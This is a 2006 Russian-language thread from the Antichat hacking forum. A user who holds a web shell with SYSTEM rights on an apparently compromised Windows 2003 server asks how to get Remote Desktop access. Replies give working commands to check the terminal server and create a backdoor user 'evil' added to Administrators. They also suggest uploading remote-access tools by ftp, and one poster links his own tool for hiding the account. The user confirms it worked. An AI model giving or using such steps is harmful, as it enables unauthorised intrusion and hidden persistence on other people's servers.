Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Удаленный рабочий стол (https://forum.antichat.xyz/showthread.php?t=18206)

Dima-k17 25.04.2006 23:32

Удаленный рабочий стол
 
Всем привет! Вопрос, есть удаленная машина, на ней web-shell. Включен "Удаленный рабочий стол", насколько я знаю, логин и пасс такие же, как и на вход в систему, но они не подходят. Скачал sam файл из repair, расшифровал, не подходит ничего(((
Вопрос, как имея web-shell с правами system дописать пользователя на Удаленный рабочий стол?
Система: Win2003Server Enterprise Edition

Dronga 26.04.2006 00:03

Попробуй на своей машине Пуск -> Выполнить -> mstsc /?

Дальше увидишь... Попробуй по поисковикам поглядеть что за RDP файлы подключения.

Если пароли для удаленного рабочего стола совпадают с паролями пользователей, то брать SAM из каталога REPAIR было нелогичным, возможно расшифровал не правильно. Куда проще добавить своего пользователя командой net user /add. Или как альтернативу можно использовать команду ftp и закачать что-нибудь с функциями аналогичными удаленному рабочему столу.

Deem3n® 26.04.2006 10:09

Ну если у тебя права SYSTEM то сделай следующее:
1) проверь если запущен сервер терминалов (то что включен "удаленный рабочий стол" еще не значит что к машине можно подключатся удаленно):
Цитата:

C:\Documents and Settings\god>qwinsta /server:127.0.0.1
SESSIONNAME USERNAME ID STATE TYPE DEVICE
console Administrator 0 Active wdcon
rdp-tcp 65536 Listen rdpwd
Цитата:

как ... дописать пользователя на Удаленный рабочий стол?
2) Добавь пользователя:
Цитата:

net user evil live /ADD
(live это пароль ;) )
3) Добавь нового пользователя в группу администраторов:
Цитата:

net localgroup Administrators evil /ADD
Теперь подключайся этим пользователем
Цитата:

mstsc -v:x.x.x.x /f
x.x.x.x - ип серва. Теперь можно добавить любого существующего в системе пользователя в группу Remote Desktop Users (как это сделать описано тут).

Brun 26.04.2006 11:37

+ что бы невидно было можно мою прогу заюзать
http://forum.antichat.ru/thread17954.html
Похвалился. :-)

Dima-k17 26.04.2006 20:00

=) Всем спасибо за ответы, счас пойду пробовать...
По непонятным причинам не могу запускать приложения при помощи web-shell'a. Он долго думает, а потом выдает ошибку(404) и никакого ответа, использовал r57shell и самописный.
Параллельно вопросы:
1) Почему было нелогичным брать пассы из repair?
2)
Цитата:

Цитата:

net localgroup Administrators evil /ADD
Теперь подключайся этим пользователем
Как можно подключиться этим пользователем, если он не имет доступа к удаленному рабочему столу? По умолчанию только пользователь "Администратор" имеет доступ, но никак не группа "Администраторы"
P.S> У мну просто *nix, поэтому тяжело как-то=)

Brun 26.04.2006 21:49

Цитата:

Почему было нелогичным брать пассы из repair?
Потому что там может и не быть хеша, а если и повезёт, то может быть сложный пароль (хрен подберёш).
Цитата:

Как можно подключиться этим пользователем, если он не имет доступа к удаленному рабочему столу
Читай Большой ФАКю по РАдмину (тут же).

Dima-k17 26.04.2006 22:07

Цитата:

Сообщение от Brun
Потому что там может и не быть хеша, а если и повезёт, то может быть сложный пароль (хрен подберёш).
Читай Большой ФАКю по РАдмину (тут же).

1)Ясно, вообщем пасс я подобрал, он оказался такойже как и логин, но коннекта нету(((
2) Не в том дело, разговор идет не о РАдмине, а об Удаленном рабочем столе, о том, что заново созданный пользователь не имеет прав для подключения к УРС(Удаленный рабочий стол).

Deem3n® 27.04.2006 09:21

Цитата:

Сообщение от Dima-k17
Как можно подключиться этим пользователем, если он не имет доступа к удаленному рабочему столу? По умолчанию только пользователь "Администратор" имеет доступ, но никак не группа "Администраторы"

Можно 100%, проверял локально. Если запущен сервер терминалов то пользователям группы "Администраторы" ("Administrators") разрешено подключатся удаленно.

Brun 27.04.2006 18:33

Dima-k17 для тебя написал

http://forum.antichat.ru/threadedpos...tml#post144129

Dima-k17 27.04.2006 19:35

мммм.... всем спасибо, заработало;)


Время: 08:43